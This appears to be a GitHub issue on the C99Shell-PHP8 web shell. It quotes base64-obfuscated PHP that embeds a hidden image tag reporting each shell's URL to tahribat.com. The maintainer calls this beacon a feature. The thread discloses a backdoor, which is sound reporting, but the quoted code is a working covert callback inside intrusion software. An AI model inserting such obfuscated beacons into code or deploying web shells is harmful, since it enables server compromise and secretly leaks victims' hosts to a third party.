Backdoor to https://www.tahribat.com/svrcommand?cmd=trp&p=

[ItsPaPPy]

C99Shell-PHP8/c99.php

Line 99 in 05f098d

$enclink = urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

C99Shell-PHP8/c99.php

Line 100 in 05f098d

$isrc= base64_decode("PGltZyBzcmM9Imh0dHBzOi8vd3d3LnRhaHJpYmF0LmNvbS9zdnJjb21tYW5kP2NtZD10cnAmcD0=").$enclink.base64_decode("IiBvbmVycm9yPSJ0aGlzLnN0eWxlLmRpc3BsYXk9J25vbmUnIi8+");

C99Shell-PHP8/c99.php

Line 5067 in 05f098d

<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>maintained by</b></u></a> HolyOne | <a href="https://github.com/HolyOne/C99Shell-PHP8"><font color="#FF0000">C99Shell Github</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime() - starttime, 4); ?> ]--</b><?php echo($isrc); ?></p></td></tr></table>

Creator added a backdoor to log every instance of this to their site, so they can also use it.

[HolyOne]

It is not a bug, its a feature

[HolyOne]

I will keep it here so anyone can delete the lines or configure that to their own server